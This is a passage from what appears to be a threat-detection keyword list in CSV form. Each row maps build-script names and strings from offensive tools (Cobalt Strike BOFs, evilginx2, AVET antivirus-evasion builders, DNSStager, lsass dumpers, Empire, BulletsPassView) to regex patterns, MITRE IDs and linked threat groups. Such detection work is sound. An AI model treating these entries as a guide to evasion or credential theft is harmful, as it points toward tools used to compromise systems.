"*build/breg.cna*",".{0,1000}build\/breg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36354"
"*build/evilginx*",".{0,1000}build\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","36355"
"*build_40xshikata_revhttpsunstaged_win32.sh*",".{0,1000}build_40xshikata_revhttpsunstaged_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36356"
"*build_50xshikata_quiet_revhttps_win32.sh*",".{0,1000}build_50xshikata_quiet_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36357"
"*build_50xshikata_revhttps_win32.sh*",".{0,1000}build_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36358"
"*build_asciimsf_fromcmd_revhttps_win32.sh*",".{0,1000}build_asciimsf_fromcmd_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36359"
"*build_asciimsf_revhttps_win32.sh*",".{0,1000}build_asciimsf_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36360"
"*build_avetenc_dynamicfromfile_revhttps_win32.sh*",".{0,1000}build_avetenc_dynamicfromfile_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36361"
"*build_avetenc_fopen_revhttps_win32.sh*",".{0,1000}build_avetenc_fopen_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36362"
"*build_avetenc_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_avetenc_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36363"
"*build_c_shellcode*",".{0,1000}build_c_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","36364"
"*build_c_xor_ipv6(*",".{0,1000}build_c_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","36365"
"*build_c_xor_ipv6_dll(*",".{0,1000}build_c_xor_ipv6_dll\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","36366"
"*build_calcfromcmd_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfromcmd_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36367"
"*build_calcfrompowersh_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfrompowersh_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36368"
"*build_checkdomain_rc4_mimikatz.sh*",".{0,1000}build_checkdomain_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36369"
"*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*",".{0,1000}build_disablewindefpsh_xorfromcmd_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36370"
"*build_dkmc_downloadexecshc_revhttps_win32.sh*",".{0,1000}build_dkmc_downloadexecshc_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36371"
"*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadbitsadmin_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36372"
"*build_downloadbitsadmin_revhttps_win32.sh*",".{0,1000}build_downloadbitsadmin_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36373"
"*build_downloadcertutil_revhttps_win32.sh*",".{0,1000}build_downloadcertutil_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36374"
"*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadcurl_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36375"
"*build_golang_xor_ipv6(*",".{0,1000}build_golang_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","36376"
"*build_onionpipe.bash*",".{0,1000}build_onionpipe\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","36377"
"*build_sleep_rc4_mimikatz.sh*",".{0,1000}build_sleep_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36378"
"*build_svc_20xshikata_bindtcp_win32.sh*",".{0,1000}build_svc_20xshikata_bindtcp_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","36379"
"*build_tor_darwin.bash*",".{0,1000}build_tor_darwin\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","36380"
"*build_tor_debian.bash*",".{0,1000}build_tor_debian\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","36381"
"*BuildBOFs.exe*",".{0,1000}BuildBOFs\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","36382"
"*BuildBOFs.sln*",".{0,1000}BuildBOFs\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","36383"
"*builder/linpeas_parts/*",".{0,1000}builder\/linpeas_parts\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36384"
"*Building ABPTTS configuration *",".{0,1000}Building\sABPTTS\sconfiguration\s.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","36385"
"*Building Evil Lsass Twin*",".{0,1000}Building\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","36386"
"*Building Koh BOFs*",".{0,1000}Building\sKoh\sBOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#content","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","36387"
"*Building SYSTEM impersonation*",".{0,1000}Building\sSYSTEM\simpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-MS16032.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","36388"
"*BulletsPassView.exe*",".{0,1000}BulletsPassView\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36390"
"*BulletsPassView.zip*",".{0,1000}BulletsPassView\.zip.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36391"
"*BulletsPassView_setup.exe*",".{0,1000}BulletsPassView_setup\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36392"
"*BulletsPassView_x64.exe*",".{0,1000}BulletsPassView_x64\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36393"
